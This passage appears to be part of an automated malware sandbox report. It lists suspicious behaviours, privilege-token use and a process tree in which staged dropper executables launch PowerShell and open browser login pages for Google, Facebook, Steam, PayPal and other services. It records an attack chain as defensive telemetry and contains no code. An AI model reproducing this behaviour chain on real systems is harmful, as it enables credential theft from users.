| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7NA21Vg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\143.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2F0C.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\b98529ce274669010251a0048ff10fb9.exe
"C:\Users\Admin\AppData\Local\Temp\b98529ce274669010251a0048ff10fb9.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ty1lD96.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ty1lD96.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\LW2uf85.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\LW2uf85.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uI1ds80.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uI1ds80.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1go07xH9.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1go07xH9.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x78,0x80,0x14c,0x70,0x170,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,2690306889202367742,1970939696536488573,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,2690306889202367742,1970939696536488573,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,14261802836894432204,17272348062068197580,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,14261802836894432204,17272348062068197580,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,3921952360257209032,6578769962926773547,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:3
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,3921952360257209032,6578769962926773547,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x108,0x170,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3844 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,13830320178860476583,13455786851214449276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,6963761902398481772,1336715240410684328,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2IX3959.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2IX3959.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6452 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7NA21Vg.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7NA21Vg.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6328 -ip 6328
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6328 -s 540
C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe ff572ff7ed834b19ba83d5804a7426e8 Jj2QSc4RPkCnobB0vYsT2Q.0.1.0.0.0
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
